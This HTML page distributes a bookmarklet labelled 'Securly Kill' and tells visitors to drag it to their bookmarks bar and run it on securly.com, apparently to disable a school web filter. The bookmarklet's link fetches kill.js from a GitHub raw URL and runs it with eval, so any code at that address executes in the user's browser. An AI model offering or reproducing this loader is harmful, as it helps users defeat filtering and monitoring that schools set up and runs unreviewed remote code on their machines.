<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Bookmarklet</title>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@400;&display=swap" rel="stylesheet" />
  <style>
    * {
      font-family: "Roboto", Arial, sans-serif;
    }

    body {
      background-color: #1e1f22;
      color: white;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
      text-align: center;
      padding: 1em;
    }

    .container {
      max-width: 600px;
    }

    h1, h2 {
      color: #9dbae9;
    }

    a.bookmarklet {
      display: inline-block;
      background: transparent;
      color: #9dbae9;
      font-weight: bold;
      border: 1px solid #047db7;
      border-radius: 40px;
      width: 250px;
      height: 60px;
      line-height: 60px;
      text-align: center;
      text-decoration: none;
      font-size: 20px;
      margin-top: 20px;
      transition: background 0.2s ease-in-out;
      cursor: grab;
    }

    a.bookmarklet:hover {
      background: #38393b;
    }

    p.instructions {
      max-width: 500px;
      color: #ccc;
      margin-top: 10px;
      font-size: 16px;
    }
  </style>
</head>
<body>
  <a href="index.html" style="position: absolute; top: 0; right: 0; border: 0; border-radius: 0 0 0 20px; background-color: #f44336; color: white; padding: 14px 25px; text-align: center; text-decoration: none; display: inline-block;" >Back</a>
  <div class="container">
    <h1>🔖 The Bookmarklet</h1>
    <h2>Drag the button below to your bookmarks bar</h2>

    <!-- Bookmarklet Link -->
    <a class="bookmarklet" href="javascript:fetch('https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/main/kill.js').then(r => r.text()).then(r => eval(r))">
      Securly Kill
    </a>

    <p class="instructions">
      Use the bookmark on <a href='https://securly.com'>securly.com<a>
    </p>
  </div>
</body>
</html>
